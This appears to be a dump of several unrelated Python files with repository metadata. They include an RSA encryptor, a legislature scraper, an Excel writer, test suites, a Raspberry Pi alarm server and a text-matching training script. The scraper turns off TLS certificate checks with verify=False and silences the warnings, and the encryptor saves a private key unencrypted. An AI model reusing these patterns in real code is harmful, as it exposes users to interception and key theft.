] | null | null | null |
build/lib.linux-x86_64-2.7/biograder/Encryptor.py
|
PayneLab/GenericDataAPI
|
9469328c4f845fbf8d97b5d80ad2077c9f927022
|
[
"MIT"
] | 2 |
2020-11-23T02:09:57.000Z
|
2021-08-13T21:57:03.000Z
|
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives import serialization
class Encryptor:
def __init__(self):
#Todo: read key from file
self.public_key = self.getKey()
pass
def getKey(self):
with open("public_key.pem", "rb") as key_file:
public_key = serialization.load_pem_public_key(
key_file.read(),
backend=default_backend()
)
return public_key
def uploadToBox(self, raw_file):
#need to parse out answers and encrypt them
#create new file and push the encrypted answers (and hints to separate file unencrypted)
pass
def encrypt(self, raw_data):
print(raw_data)
#below posed as a possible alternative
#pow(message, public.e, public.n)
encrypted = self.public_key.encrypt(
raw_data,
padding.OAEP(
#mgf=padding.MGF1(algorithm=hashes.SHA256()),
mgf=padding.MGF1(algorithm=hashes.SHA256()),
algorithm=hashes.SHA256(),
label=None
)
)
return encrypted
#only called once ever! don't want more than one set of keys
def saveKey(self, public_key, private_key):
pem = public_key.public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
)
with open('public_key.pem', 'wb') as f:
f.write(pem)
pem = private_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption()
)
with open('private_key.pem', 'wb') as f:
f.write(pem)
| 31.84127 | 97 | 0.602193 | 1,766 | 0.880359 | 0 | 0 | 0 | 0 | 0 | 0 | 400 | 0.199402 |
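Encryptor.encrypt above uses RSA-OAEP with SHA-256 from the cryptography package. A self-contained round-trip sketch that generates a throwaway key pair in memory instead of reading public_key.pem, so it runs without any key files:

from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives import hashes

private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()

oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)
ciphertext = public_key.encrypt(b"answer: 42", oaep)
print(private_key.decrypt(ciphertext, oaep))  # b'answer: 42'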
7b190c0f4573cd290b14012b9fc7b11615f31516
| 218 |
py
|
Python
|
elif_bayindir/phase_1/python_basic_1/day_6/q7.py
|
CodedLadiesInnovateTech/-python-challenge-solutions
|
430cd3eb84a2905a286819eef384ee484d8eb9e7
|
[
"MIT"
] | 6 |
2020-05-23T19:53:25.000Z
|
2021-05-08T20:21:30.000Z
|
elif_bayindir/phase_1/python_basic_1/day_6/q7.py
|
CodedLadiesInnovateTech/-python-challenge-solutions
|
430cd3eb84a2905a286819eef384ee484d8eb9e7
|
[
"MIT"
] | 8 |
2020-05-14T18:53:12.000Z
|
2020-07-03T00:06:20.000Z
|
elif_bayindir/phase_1/python_basic_1/day_6/q7.py
|
CodedLadiesInnovateTech/-python-challenge-solutions
|
430cd3eb84a2905a286819eef384ee484d8eb9e7
|
[
"MIT"
] | 39 |
2020-05-10T20:55:02.000Z
|
2020-09-12T17:40:59.000Z
|
# Question 7
# Find out the number of CPUs using
import os
print("Number of CPUs using:", os.cpu_count())
# Alternative,
""" import multiprocessing
print("Number of CPUs using:", multiprocessing.cpu_count()) """
| 18.166667 | 63 | 0.711009 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 175 | 0.802752 |
7b1bfc88d4da28ede06e1a7e0dc3ba09c6ec9cb9
| 3,081 |
py
|
Python
|
openstates/openstates-master/openstates/ia/__init__.py
|
Jgorsick/Advocacy_Angular
|
8906af3ba729b2303880f319d52bce0d6595764c
|
[
"CC-BY-4.0"
] | null | null | null |
openstates/openstates-master/openstates/ia/__init__.py
|
Jgorsick/Advocacy_Angular
|
8906af3ba729b2303880f319d52bce0d6595764c
|
[
"CC-BY-4.0"
] | null | null | null |
openstates/openstates-master/openstates/ia/__init__.py
|
Jgorsick/Advocacy_Angular
|
8906af3ba729b2303880f319d52bce0d6595764c
|
[
"CC-BY-4.0"
] | null | null | null |
import re
import datetime
import lxml.html
import requests
from billy.utils.fulltext import text_after_line_numbers
from .bills import IABillScraper
from .legislators import IALegislatorScraper
from .events import IAEventScraper
from .votes import IAVoteScraper
# Silencing unverified HTTPS request warnings.
requests.packages.urllib3.disable_warnings()
settings = dict(SCRAPELIB_TIMEOUT=240)
metadata = dict(
name = 'Iowa',
abbreviation = 'ia',
capitol_timezone = 'America/Chicago',
legislature_name = 'Iowa General Assembly',
legislature_url = 'https://www.legis.iowa.gov/',
chambers = {
'upper': {'name': 'Senate', 'title': 'Senator'},
'lower': {'name': 'House', 'title': 'Representative'},
},
terms = [
{
'name': '2011-2012',
'start_year': 2011,
'end_year': 2012,
'sessions': ['2011-2012'],
},
{
'name': '2013-2014',
'start_year': 2013,
'end_year': 2014,
'sessions': ['2013-2014'],
},
{
'name': '2015-2016',
'start_year': 2015,
'end_year': 2016,
'sessions': ['2015-2016'],
},
],
session_details = {
'2011-2012': {
'display_name': '2011-2012 Regular Session',
'_scraped_name': 'General Assembly: 84',
'number': '84',
'start_date': datetime.date(2011, 1, 10),
'end_date': datetime.date(2013, 1, 13),
},
'2013-2014': {
'display_name': '2013-2014 Regular Session',
'_scraped_name': 'General Assembly: 85',
'number': '85',
},
'2015-2016': {
'display_name': '2015-2016 Regular Session',
'_scraped_name': 'General Assembly: 86',
'number': '86',
},
},
feature_flags = ['events', 'influenceexplorer'],
_ignored_scraped_sessions = [
'Legislative Assembly: 86',
'General Assembly: 83',
'General Assembly: 82',
'General Assembly: 81',
'General Assembly: 80',
'General Assembly: 79',
'General Assembly: 79',
'General Assembly: 78',
'General Assembly: 78',
'General Assembly: 77',
'General Assembly: 77',
'General Assembly: 76',
]
)
def session_list():
def url_xpath(url, path):
doc = lxml.html.fromstring(requests.get(url, verify=False).text)
return doc.xpath(path)
sessions = url_xpath(
'https://www.legis.iowa.gov/legislation/findLegislation',
"//section[@class='grid_6']//li/a/text()[normalize-space()]"
)
sessions = [x[0] for x in filter(lambda x: x != [], [
re.findall(r'^.*Assembly: [0-9]+', session)
for session in sessions
])]
return sessions
def extract_text(doc, data):
doc = lxml.html.fromstring(data)
text = doc.xpath('//pre')[0].text_content()
# strip two sets of line numbers
return text_after_line_numbers(text_after_line_numbers(text))
| 29.066038 | 72 | 0.563778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,182 | 0.383642 |
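session_list() above scrapes session names with an XPath over the Iowa legislature page and then filters them with a regex. The same extraction on a literal HTML snippet, so it can be run offline (the HTML here is a minimal stand-in for the real page):

import re
import lxml.html

html = "<section class='grid_6'><ul><li><a>General Assembly: 86</a></li></ul></section>"
doc = lxml.html.fromstring(html)
sessions = doc.xpath("//section[@class='grid_6']//li/a/text()[normalize-space()]")
sessions = [m[0] for m in (re.findall(r'^.*Assembly: [0-9]+', s) for s in sessions) if m]
print(sessions)  # ['General Assembly: 86']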
7b1e18b2a4656893e78e78b318983823f4f03309
| 2,965 |
py
|
Python
|
dp_excel/ExcelFile.py
|
DmitryPaschenko/python_excel_writer
|
d23acbe44e3e7e786fd8fd8deb1f47263326199f
|
[
"MIT"
] | null | null | null |
dp_excel/ExcelFile.py
|
DmitryPaschenko/python_excel_writer
|
d23acbe44e3e7e786fd8fd8deb1f47263326199f
|
[
"MIT"
] | null | null | null |
dp_excel/ExcelFile.py
|
DmitryPaschenko/python_excel_writer
|
d23acbe44e3e7e786fd8fd8deb1f47263326199f
|
[
"MIT"
] | null | null | null |
from openpyxl import Workbook
from openpyxl.utils import get_column_letter
from openpyxl.writer.excel import save_virtual_workbook
class ExcelFile:
def __init__(self, file_name):
self.file_name = file_name
self.workbook = Workbook()
self.active_worksheet = self.workbook.active
self.current_position = {'col': 1, 'row': 1}
@staticmethod
def get_idx(column_number, row_number):
return '{column}{row}'.format(column=get_column_letter(column_number), row=row_number)
def add_worksheet(self, title=None, index=None, set_is_active=True):
worksheet = self.workbook.create_sheet(title=title, index=index)
if set_is_active:
self.set_active_worksheet(worksheet)
def get_worksheet_by_title(self, title):
for sheet in self.workbook:
if sheet.title == title:
return sheet
raise ValueError('Worksheet with title {0} Not Found'.format(title))
def set_active_worksheet(self, worksheet):
self.active_worksheet = worksheet
def set_active_worksheet_by_title(self, title):
self.active_worksheet = self.get_worksheet_by_title(title=title)
def set_position(self, column_number, row_number):
"""
Set active excel cell
:param column_number: integer
:param row_number: integer
:return:
"""
self.current_position = {'col': column_number, 'row': row_number}
return self
def render_row_by_template(self, template):
"""
Render row by template
:param template: ExcelRowTemplate object
:return:
"""
start_col_idx = self.current_position['col']
for row in template.get_rows():
self.current_position['col'] = start_col_idx
template.get_row_options(row).apply_row_options(self.active_worksheet, self.current_position['row'])
for cell in template.get_columns(row):
if not cell.is_empty:
col_idx = get_column_letter(self.current_position['col'])
row_idx = self.current_position['row']
cell_idx = '{column}{row}'.format(column=col_idx, row=row_idx)
self.active_worksheet[cell_idx] = cell.value
cell.options.apply_cell_options(self.active_worksheet, self.current_position['col'], row_idx)
self.current_position['col'] += 1
self.current_position['row'] += 1
self.current_position['col'] = start_col_idx
def save(self, path=None):
self.workbook.save('{0}{1}.xlsx'.format(path if path else '', self.file_name))
def get_virtual_workbook(self):
"""
EXAMPLE USING return HttpResponse(excel_file.get_virtual_workbook(), content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')
:return:
"""
return save_virtual_workbook(self.workbook)
| 36.158537 | 158 | 0.651602 | 2,831 | 0.954806 | 0 | 0 | 152 | 0.051265 | 0 | 0 | 588 | 0.198314 |
7b1ea6dc53dbed446cf8e4fe80ef8e9dd14dbdfd
| 435 |
py
|
Python
|
test/test_flow.py
|
williford/vipy
|
d7ce90cfa3c11363ca9e9fcb1fcea9371aa1b74d
|
[
"MIT"
] | 13 |
2020-07-23T12:15:24.000Z
|
2022-03-18T13:58:31.000Z
|
test/test_flow.py
|
williford/vipy
|
d7ce90cfa3c11363ca9e9fcb1fcea9371aa1b74d
|
[
"MIT"
] | 2 |
2020-02-26T00:58:40.000Z
|
2021-04-26T12:34:41.000Z
|
test/test_flow.py
|
williford/vipy
|
d7ce90cfa3c11363ca9e9fcb1fcea9371aa1b74d
|
[
"MIT"
] | 2 |
2020-05-11T15:31:06.000Z
|
2021-09-16T14:01:33.000Z
|
import vipy
from vipy.flow import Flow
import numpy as np
def test_flow():
imfrom = vipy.image.RandomScene(num_objects=1)
imto = imfrom.clone().zeropad(5, 10).cornercrop(imfrom.height(), imfrom.width())
imf = Flow().imageflow(imfrom, imto)
assert np.abs(np.median(imf.dx()) - 5) < 1 and np.abs(np.median(imf.dy()) - 10) < 1
print('[test_flow.imageflow]: PASSED')
if __name__ == "__main__":
test_flow()
| 25.588235 | 87 | 0.65977 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 41 | 0.094253 |
7b204556097cfdfd3ff88e8d7bc8bf1337b3e12c
| 660 |
py
|
Python
|
server/main.py
|
DarthBenro008/gh-release-paniker
|
757845b1eebef9d2219c88706fd4277f4261391f
|
[
"MIT"
] | 5 |
2021-12-08T06:37:33.000Z
|
2021-12-20T17:17:18.000Z
|
server/main.py
|
DarthBenro008/gh-release-paniker
|
757845b1eebef9d2219c88706fd4277f4261391f
|
[
"MIT"
] | null | null | null |
server/main.py
|
DarthBenro008/gh-release-paniker
|
757845b1eebef9d2219c88706fd4277f4261391f
|
[
"MIT"
] | null | null | null |
from typing import Optional
from fastapi import FastAPI
app = FastAPI()
import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
LED=21
BUZZER=23
GPIO.setup(LED,GPIO.OUT)
GPIO.setup(BUZZER,GPIO.OUT)
def panikMode():
print("Entering PanikMode")
GPIO.output(LED,GPIO.HIGH)
GPIO.output(BUZZER,GPIO.HIGH)
def stopPanikMode():
print("Exiting PanikMode")
GPIO.output(LED,GPIO.LOW)
GPIO.output(BUZZER,GPIO.LOW)
@app.get("/")
def read_root():
return {"ping": "pong"}
@app.get("/stop")
def stopPanik():
    stopPanikMode()
    return {"paniking": False}
@app.get("/panik")
def panik():
panikMode()
return {"paniking": True}
| 16.5 | 33 | 0.672727 | 0 | 0 | 0 | 0 | 218 | 0.330303 | 0 | 0 | 96 | 0.145455 |
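Since the module above imports RPi.GPIO (so it only loads on a Raspberry Pi), here is a hardware-free FastAPI sketch of the same endpoint pattern that can be exercised anywhere with the test client. The endpoint body is a stub, and it assumes fastapi and its test-client dependency are installed.

from fastapi import FastAPI
from fastapi.testclient import TestClient

app = FastAPI()

@app.get("/panik")
def panik():
    return {"paniking": True}  # GPIO calls omitted in this sketch

client = TestClient(app)
print(client.get("/panik").json())  # {'paniking': True}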
7b20674499d7148c6a6ca240f5128fad607757fd
| 8,656 |
py
|
Python
|
virtual/lib/python3.10/site-packages/bootstrap_py/tests/test_package.py
|
alex-mu/Moringa-blog
|
430ab9c1f43f2f0066369433ac3f60c41a51a01c
|
[
"MIT"
] | null | null | null |
virtual/lib/python3.10/site-packages/bootstrap_py/tests/test_package.py
|
alex-mu/Moringa-blog
|
430ab9c1f43f2f0066369433ac3f60c41a51a01c
|
[
"MIT"
] | 7 |
2021-03-30T14:10:56.000Z
|
2022-03-12T00:43:13.000Z
|
virtual/lib/python3.6/site-packages/bootstrap_py/tests/test_package.py
|
sarahsindet/pitch
|
c7a4256e19c9a250b6d88d085699a34f508eb86b
|
[
"Unlicense",
"MIT"
] | 1 |
2021-08-19T06:07:23.000Z
|
2021-08-19T06:07:23.000Z
|
# -*- coding: utf-8 -*-
"""bootstrap_py.tests.test_package."""
import unittest
import os
import shutil
import tempfile
from glob import glob
from datetime import datetime
from mock import patch
from bootstrap_py import package
from bootstrap_py.tests.stub import stub_request_metadata
# pylint: disable=too-few-public-methods
class Dummy:
"""Dummy class."""
class PackageDataTests(unittest.TestCase):
"""bootstrap_py.package.PackageData tests."""
def setUp(self):
"""Prepare test data."""
self.params = Dummy()
setattr(self.params, 'foo', 'hoge')
setattr(self.params, 'bar', 'moge')
setattr(self.params, 'baz', 'fuga')
self.default_params = Dummy()
setattr(self.default_params, 'date', '2016-01-29')
setattr(self.default_params, 'version', '1.0.0')
setattr(self.default_params, 'description', 'dummy description.')
self.metadata = stub_request_metadata()
def test_provides_params(self):
"""provides params without default params."""
pkg_data = package.PackageData(self.params)
# pylint: disable=no-member
self.assertEqual(pkg_data.foo, 'hoge')
self.assertEqual(pkg_data.bar, 'moge')
self.assertEqual(pkg_data.baz, 'fuga')
self.assertEqual(pkg_data.date, datetime.utcnow().strftime('%Y-%m-%d'))
self.assertEqual(pkg_data.version, '0.1.0')
# pylint: disable=fixme
self.assertEqual(pkg_data.description, '##### ToDo: Rewrite me #####')
def test_provides_default_params(self):
"""provides params without default params."""
pkg_data = package.PackageData(self.default_params)
# pylint: disable=no-member
self.assertEqual(pkg_data.date, '2016-01-29')
self.assertEqual(pkg_data.version, '1.0.0')
self.assertEqual(pkg_data.description, 'dummy description.')
def test_convert_to_dict(self):
"""convert PackageData to dict."""
dict_data = package.PackageData(self.default_params).to_dict()
# pylint: disable=no-member
self.assertEqual(dict_data.get('date'), '2016-01-29')
self.assertEqual(dict_data.get('version'), '1.0.0')
self.assertEqual(dict_data.get('description'), 'dummy description.')
class PackageTreeTests(unittest.TestCase):
"""bootstrap.package.PackageTree tests."""
def setUp(self):
"""Prepare test data."""
self.cwd = os.getcwd()
self.testdir = tempfile.mkdtemp(suffix='-bootstrap-py-test')
params = Dummy()
setattr(params, 'name', 'foo')
setattr(params, 'author', 'Alice')
setattr(params, 'email', '[email protected]')
setattr(params, 'url', 'https://example.org/foo')
setattr(params, 'license', 'gplv3')
setattr(params, 'outdir', self.testdir)
setattr(params, 'with_samples', True)
stub_request_metadata()
self.pkg_data = package.PackageData(params)
self.pkg_tree = package.PackageTree(self.pkg_data)
def tearDown(self):
os.chdir(self.cwd)
shutil.rmtree(self.testdir)
if os.path.isdir(self.pkg_tree.tmpdir):
self.pkg_tree.clean()
def test_initialize(self):
"""initialize PackageTree."""
self.assertEqual(self.pkg_tree.name, 'foo')
self.assertEqual(self.pkg_tree.outdir, self.testdir)
self.assertTrue(os.path.isdir(self.pkg_tree.tmpdir))
self.assertEqual(len(self.pkg_tree.templates.list_templates()), 18)
self.assertEqual(self.pkg_tree.pkg_data, self.pkg_data)
def test_init_py(self):
"""convert __init__.py path."""
self.assertEqual(getattr(self.pkg_tree, '_init_py')('foo/bar'),
os.path.join(self.pkg_tree.tmpdir,
'foo/bar/__init__.py'))
def test_tmpl_path(self):
"""convert tmplate path."""
self.assertEqual(getattr(self.pkg_tree, '_tmpl_path')('foo.py.j2'),
os.path.join(self.pkg_tree.tmpdir,
'foo.py'))
def test_generate_dirs(self):
"""generate directories."""
getattr(self.pkg_tree, '_generate_dirs')()
os.chdir(self.pkg_tree.tmpdir)
self.assertTrue(os.path.isdir(self.pkg_tree.pkg_data.module_name))
self.assertTrue(os.path.isdir(
os.path.join(self.pkg_tree.pkg_data.module_name,
'tests')))
self.assertTrue(os.path.isdir('utils'))
self.assertTrue(os.path.isdir('docs/source/modules'))
def test_list_module_dirs(self):
"""list module directories."""
self.assertEqual(getattr(self.pkg_tree, '_list_module_dirs')(),
['{module_name}', '{module_name}/tests'])
def test_generate_init(self):
"""generate __init__.py."""
getattr(self.pkg_tree, '_generate_dirs')()
getattr(self.pkg_tree, '_generate_init')()
os.chdir(self.pkg_tree.tmpdir)
self.assertTrue(os.path.isfile('foo/__init__.py'))
self.assertTrue(os.path.isfile('foo/tests/__init__.py'))
def test_generate_files(self):
"""generate files."""
getattr(self.pkg_tree, '_generate_dirs')()
getattr(self.pkg_tree, '_generate_files')()
os.chdir(self.pkg_tree.tmpdir)
self.assertEqual(len([i for i in glob('./*')
if os.path.isfile(i)]), 6)
self.assertEqual(len([i for i in glob('./.*')
if os.path.isfile(i)]), 5)
self.assertEqual(len([i for i in glob('utils/*')
if os.path.isfile(i)]), 1)
self.assertEqual(len([i for i in glob('docs/source/*')
if os.path.isfile(i)]), 3)
self.assertEqual(len([i for i in glob('docs/source/modules/*')
if os.path.isfile(i)]), 1)
def test_generate_files_samples(self):
"""generate files."""
self.pkg_data.with_samples = True
getattr(self.pkg_tree, '_generate_dirs')()
getattr(self.pkg_tree, '_generate_files')()
os.chdir(self.pkg_tree.tmpdir)
self.assertEqual(len([i for i in glob('./*')
if os.path.isfile(i)]), 6)
self.assertEqual(len([i for i in glob('./.*')
if os.path.isfile(i)]), 5)
self.assertEqual(len([i for i in glob('foo/*')
if os.path.isfile(i)]), 2)
self.assertEqual(len([i for i in glob('foo/tests/*')
if os.path.isfile(i)]), 2)
self.assertEqual(len([i for i in glob('utils/*')
if os.path.isfile(i)]), 1)
self.assertEqual(len([i for i in glob('docs/source/*')
if os.path.isfile(i)]), 3)
self.assertEqual(len([i for i in glob('docs/source/modules/*')
if os.path.isfile(i)]), 1)
def test_move(self):
"""move source directory to destination directory."""
self.pkg_tree.move()
self.assertFalse(os.path.isdir(self.pkg_tree.tmpdir))
self.assertTrue(os.path.isdir(self.testdir))
@patch('subprocess.call')
def test_generate(self, _mock):
"""generate directories, and files."""
popen_mock = _mock.return_value
popen_mock.wait = None
popen_mock.call = None
self.pkg_tree.generate()
os.chdir(self.pkg_tree.tmpdir)
self.assertTrue(os.path.isdir(self.pkg_tree.name))
self.assertTrue(os.path.isdir(os.path.join(self.pkg_tree.name,
'tests')))
self.assertTrue(os.path.isdir('utils'))
self.assertTrue(os.path.isdir('docs/source/modules'))
self.assertTrue(os.path.isfile('foo/__init__.py'))
self.assertTrue(os.path.isfile('foo/tests/__init__.py'))
self.assertEqual(len([i for i in glob('./*')
if os.path.isfile(i)]), 6)
self.assertEqual(len([i for i in glob('./.*')
if os.path.isfile(i)]), 5)
self.assertEqual(len([i for i in glob('utils/*')
if os.path.isfile(i)]), 1)
self.assertEqual(len([i for i in glob('docs/source/*')
if os.path.isfile(i)]), 3)
self.assertEqual(len([i for i in glob('docs/source/modules/*')
if os.path.isfile(i)]), 1)
def test_clean(self):
"""clean up."""
self.pkg_tree.clean()
self.assertFalse(os.path.isdir(self.pkg_tree.tmpdir))
| 42.019417 | 79 | 0.586992 | 8,321 | 0.961299 | 0 | 0 | 1,291 | 0.149145 | 0 | 0 | 1,818 | 0.210028 |
7b2072a69cb5c6d86996ccfc0e3130c0fc1d1caa
| 383 |
py
|
Python
|
news_bl/main/migrations/0005_alter_article_urltoimage.py
|
noddy09/news_search
|
7bee6a3aeb6c8a5e9e01109635fbd53f5d808722
|
[
"MIT"
] | null | null | null |
news_bl/main/migrations/0005_alter_article_urltoimage.py
|
noddy09/news_search
|
7bee6a3aeb6c8a5e9e01109635fbd53f5d808722
|
[
"MIT"
] | null | null | null |
news_bl/main/migrations/0005_alter_article_urltoimage.py
|
noddy09/news_search
|
7bee6a3aeb6c8a5e9e01109635fbd53f5d808722
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.6 on 2021-08-30 13:48
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0004_auto_20210830_0359'),
]
operations = [
migrations.AlterField(
model_name='article',
name='urlToImage',
field=models.URLField(null=True),
),
]
| 20.157895 | 47 | 0.5953 | 290 | 0.75718 | 0 | 0 | 0 | 0 | 0 | 0 | 99 | 0.258486 |
7b20cd11ee3f48070fe24a5a912f30b91ada5d46
| 1,175 |
py
|
Python
|
utils/migrate_cmds_idx_32bit.py
|
jzuhone/kadi
|
de4885327d256e156cfe42b2b1700775f5b4d6cf
|
[
"BSD-3-Clause"
] | 1 |
2015-07-30T18:33:14.000Z
|
2015-07-30T18:33:14.000Z
|
utils/migrate_cmds_idx_32bit.py
|
jzuhone/kadi
|
de4885327d256e156cfe42b2b1700775f5b4d6cf
|
[
"BSD-3-Clause"
] | 104 |
2015-01-20T18:44:36.000Z
|
2022-03-29T18:51:55.000Z
|
utils/migrate_cmds_idx_32bit.py
|
jzuhone/kadi
|
de4885327d256e156cfe42b2b1700775f5b4d6cf
|
[
"BSD-3-Clause"
] | 2 |
2018-08-23T02:36:08.000Z
|
2020-03-13T19:24:36.000Z
|
from pathlib import Path
import numpy as np
import tables
# Use snapshot from aug08 before the last update that broke things.
with tables.open_file('cmds_aug08.h5') as h5:
cmds = h5.root.data[:]
print(cmds.dtype)
# [('idx', '<u2'), ('date', 'S21'), ('type', 'S12'), ('tlmsid', 'S10'),
# ('scs', 'u1'), ('step', '<u2'), ('timeline_id', '<u4'), ('vcdu', '<i4')]
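# Widen 'idx' from uint16 ('<u2') to int32 ('<i4'); every other column keeps its dtype.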
new_dtype = [('idx', '<i4'), ('date', 'S21'), ('type', 'S12'), ('tlmsid', 'S10'),
('scs', 'u1'), ('step', '<u2'), ('timeline_id', '<u4'), ('vcdu', '<i4')]
new_cmds = cmds.astype(new_dtype)
for name in cmds.dtype.names:
assert np.all(cmds[name] == new_cmds[name])
cmds_h5 = Path('cmds.h5')
if cmds_h5.exists():
cmds_h5.unlink()
with tables.open_file('cmds.h5', mode='a') as h5:
h5.create_table(h5.root, 'data', new_cmds, "cmds", expectedrows=2e6)
# Make sure the new file is really the same except the dtype
with tables.open_file('cmds.h5') as h5:
new_cmds = h5.root.data[:]
for name in cmds.dtype.names:
assert np.all(cmds[name] == new_cmds[name])
if name != 'idx':
assert cmds[name].dtype == new_cmds[name].dtype
assert new_cmds['idx'].dtype.str == '<i4'
| 31.756757 | 85 | 0.613617 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 439 | 0.373617 |
7b21a08900385c33387348bb5cf7b32f2eca5c0f
| 579 |
py
|
Python
|
1_estrutura_sequencial/18_velocidade_download.py
|
cecilmalone/lista_de_exercicios_pybr
|
6d7c4aeddf8d1b1d839ad05ef5b5813a8fe611b5
|
[
"MIT"
] | null | null | null |
1_estrutura_sequencial/18_velocidade_download.py
|
cecilmalone/lista_de_exercicios_pybr
|
6d7c4aeddf8d1b1d839ad05ef5b5813a8fe611b5
|
[
"MIT"
] | null | null | null |
1_estrutura_sequencial/18_velocidade_download.py
|
cecilmalone/lista_de_exercicios_pybr
|
6d7c4aeddf8d1b1d839ad05ef5b5813a8fe611b5
|
[
"MIT"
] | null | null | null |
"""
18. Faça um programa que peça o tamanho de um arquivo para download (em MB) e
a velocidade de um link de Internet (em Mbps), calcule e informe o tempo
aproximado de download do arquivo usando este link (em minutos).
"""
mb_arquivo = float(input('Enter the size of the file to download (in MB): '))
mbps_link = float(input('Enter the Internet link speed (in Mbps): '))
# Convert megabytes to megabits (x 8) before dividing by the link speed in Mbps.
velocidade_segundos = mb_arquivo * 8 / mbps_link
velocidade_minutos = velocidade_segundos / 60
print('The approximate download time for the file is %d minute(s).' % velocidade_minutos)
| 38.6 | 91 | 0.753022 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 403 | 0.69244 |
7b2304794deb520b2f5f87d0e37dcca35db22896
| 4,802 |
py
|
Python
|
src/rte_pac/train_pyramid.py
|
UKPLab/conll2019-snopes-experiments
|
102f4a05cfba781036bd3a7b06022246e53765ad
|
[
"Apache-2.0"
] | 5 |
2019-11-08T09:17:07.000Z
|
2022-01-25T19:37:06.000Z
|
src/rte_pac/train_pyramid.py
|
UKPLab/conll2019-snopes-experiments
|
102f4a05cfba781036bd3a7b06022246e53765ad
|
[
"Apache-2.0"
] | 18 |
2020-01-28T22:17:34.000Z
|
2022-03-11T23:57:22.000Z
|
src/rte_pac/train_pyramid.py
|
UKPLab/conll2019-snopes-experiments
|
102f4a05cfba781036bd3a7b06022246e53765ad
|
[
"Apache-2.0"
] | 1 |
2021-03-08T12:02:24.000Z
|
2021-03-08T12:02:24.000Z
|
import argparse
import pickle
import os
import json
from sklearn.metrics import confusion_matrix
from utils.data_reader import embed_data_sets_with_glove, embed_data_set_given_vocab, prediction_2_label
from utils.text_processing import vocab_map
from common.util.log_helper import LogHelper
from deep_models.MatchPyramid import MatchPyramid
def _instantiate_model(param):
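    """Build a MatchPyramid model configured from the pre-processed parameters (vocab, embeddings, sentence limits)."""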
return MatchPyramid(random_state=55, tensorboard_logdir="logdir/", dropout_rate=0.15, learning_rate=0.0001, batch_size=32,
num_sents=param['max_sent'], embedding=param['embeddings'], show_progress=1, h_max_length=param['max_sent_size'],
s_max_length=param['max_sent_size'], word_dict=param['vocab'])
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--mode', help='\'train\' or \'test\'', required=True)
parser.add_argument('--train', help='/path/to/training/set')
parser.add_argument('--valid', help='/path/to/validation/set')
parser.add_argument('--test', help='/path/to/test/set')
parser.add_argument('--model', help='/path/to/model/file', required=True)
parser.add_argument(
'--save-data', help='/path/to/save/data', default="data/rte/train/")
parser.add_argument('--load-data', help='/path/to/load/data/file')
parser.add_argument('--db', help='/path/to/data/base', required=True)
parser.add_argument(
'--max-sent', type=int, help='Maximal number of sentences per claim', default=5)
parser.add_argument('--embed', help='/path/to/embedding')
parser.add_argument(
'--save-result', help='/path/to/save/result', default="data/rte/result/")
args = parser.parse_args()
LogHelper.setup()
logger = LogHelper.get_logger(args.mode)
if args.mode == 'train':
assert args.train is not None or args.load_data is not None, "--train training set or --load-data should be provided in train mode"
assert args.embed is not None, "--embed should be provided in train mode"
# training mode
if args.load_data:
# load pre-processed training data
with open(args.load_data, "rb") as file:
param = pickle.load(file)
else:
# process training JSONL file
paths = [args.train, args.valid]
dataset_list, vocab, embeddings, b_max_sent_num, b_max_sent_size = embed_data_sets_with_glove(
paths, args.db, args.embed, threshold_b_sent_num=args.max_sent)
vocab = vocab_map(vocab)
param = {
'dataset_list': dataset_list,
'vocab': vocab,
'embeddings': embeddings,
'max_sent_size': b_max_sent_size,
'max_sent': args.max_sent
}
# save processed training data
os.makedirs(args.save_data, exist_ok=True)
train_data_path = os.path.join(
args.save_data, "train.{}.s{}.p".format("matchpyramid", str(args.max_sent)))
with open(train_data_path, "wb") as file:
pickle.dump(param, file, protocol=pickle.HIGHEST_PROTOCOL)
pyramid = _instantiate_model(param)
pyramid.fit(param['dataset_list'][0]['data'], param['dataset_list'][0]['label'],
param['dataset_list'][1]['data'], param['dataset_list'][1]['label'])
pyramid.save(args.model)
else:
# testing mode
assert args.load_data is not None, "--load_data should be provided in test mode"
assert args.test is not None, "--test test set should be provided in test mode"
with open(args.load_data, "rb") as file:
param = pickle.load(file)
pyramid = _instantiate_model(param)
pyramid.restore_model(args.model)
data_set = embed_data_set_given_vocab(args.test, args.db, param['vocab'], threshold_b_sent_num=param['max_sent'],
threshold_b_sent_size=param['max_sent_size'], threshold_h_sent_size=param['max_sent_size'])
os.makedirs(args.save_result, exist_ok=True)
test_result_path = os.path.join(
args.save_result, "predicted.pyramid.s{}.jsonl".format(param['max_sent']))
with open(test_result_path, "w") as result_file:
predictions = pyramid.predict(data_set['data'])
for i, prediction in enumerate(predictions):
data = {'predicted': prediction_2_label(prediction)}
if 'label' in data_set:
data['label'] = prediction_2_label(data_set['label'][i])
result_file.write(json.dumps(data) + "\n")
if 'label' in data_set:
logger.info("Confusion Matrix:")
logger.info(confusion_matrix(data_set['label'], predictions))
| 52.195652 | 139 | 0.641399 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,162 | 0.241983 |
7b2354c08ba6d3f70427aa659e1ba9d3a3e03c13
| 854 |
py
|
Python
|
annotation/helpers/helpers/extract_noise.py
|
jim-schwoebel/allie
|
d85db041b91c81dfb3fd1a4d719b5aaaf3b6697e
|
[
"Apache-2.0"
] | 87 |
2020-08-07T09:05:11.000Z
|
2022-01-24T00:48:22.000Z
|
